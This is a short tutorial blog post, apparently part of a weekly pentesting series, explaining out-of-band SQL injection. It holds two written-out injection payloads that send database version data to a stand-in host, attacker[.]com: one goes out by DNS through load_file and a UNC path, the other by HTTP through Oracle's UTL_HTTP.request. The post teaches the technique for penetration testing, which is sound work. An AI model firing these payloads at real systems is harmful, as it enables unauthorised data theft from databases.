Week 38 - Out of Band SQLi
Last updated
Last updated
Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi.
If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean?
Out-of-Band means we are receiving the payload result through a different channel than the payload request. There are two main channels used for retrieving the payload result: DNS and HTTP.
Retrieving the payload result through DNS would look like the following SQL injection:
vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT(“\\\\”,(SELECT+@version),”.attacker[.]com\\test”)
Since the CONCAT function combines multiple strings into one, this injection will cause the back-end database to load the following URL:
\\\\10.3.16-MariaDB[.]attacker[.]com\\test
So if we have a listener running on our attacker server, we can wait for incoming DNS requests and retrieve the results!
Now as mentioned before we can also use HTTP-based exfiltration, which is typically used when the back-end database is Oracle because they support the UTL_HTTP.request function:
vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request(“http[:]//attacker[.]com/?version=”||(SELECT version FROM v$instance)) FROM dual
This will issue an HTTP request to the following URL:
http[:]//attacker[.]com/?version=
18.0.0.0
.0
And we can just listen for incoming HTTP connections! This technique can be an exotic way of bypassing WAF’s or exploiting a tricky injection. Worth adding to your pentest arsenal!